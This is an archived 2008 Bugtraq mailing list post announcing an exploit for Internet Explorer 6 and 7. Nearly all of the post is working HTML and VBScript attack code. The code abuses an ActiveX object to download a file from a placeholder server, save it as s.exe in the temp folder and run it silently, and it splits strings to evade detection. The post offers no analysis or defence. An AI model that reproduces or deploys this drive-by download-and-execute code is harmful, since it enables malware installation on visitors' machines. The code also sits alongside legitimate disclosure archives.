lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20080128113717.32160.qmail@securityfocus.com>
Date: 28 Jan 2008 11:37:17 -0000
From: r2t@...mail.it
To: bugtraq@...urityfocus.com
Subject: Exploit in IE6,7

Discovred By : Hasadya Raed
E-mail : r2t@...mail.it , Hacker_Web@...n
-----------------------------------------
Exploit : Internet Explorer 6,7
-----------------------------------------
Code : 

<HTML>
<HEAD>
<**** http-eqiv="content-type" content="text/html;charset=gb2312">
<title>test</title>
<textarea style="display:none" id=lshdic200Xpage rows="1" cols="20"></textarea><script language=vbs>document.write(strreverse(lshdic200Xpage.value))</script>
<script

language="VBScript">
  on error resume next
  xx="object"
  xxx="classid"
  xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  xxxxx="Microsoft.XMLHTTP"
  xxxxxx="GET"
  xxxxxxx="Scripting.FileSystemObject"
  xxxxxxxx="Shell.Application"
  dl = "http://Path-Server"
  Set df = document.createElement(xx)
  df.setAttribute xxx, xxxx
  str=xxxxx
  Set a = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6=xxxxxx
  a.Open str6, dl, 0
  a.Send
  fname1="s.exe"
  set F = df.createobject(xxxxxxx,"")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write a.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject(xxxxxxxx,"")
  str1=a1&a2&a3&a4
  Q.ShellExecute fname1,"","","open",0
  </script>
<script type="text/jscript">
function init() {
document.write(Date());

}
window.onload = init;
</script>
</HEAD>
<BODY>
</BODY>
</HTML>

-----------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ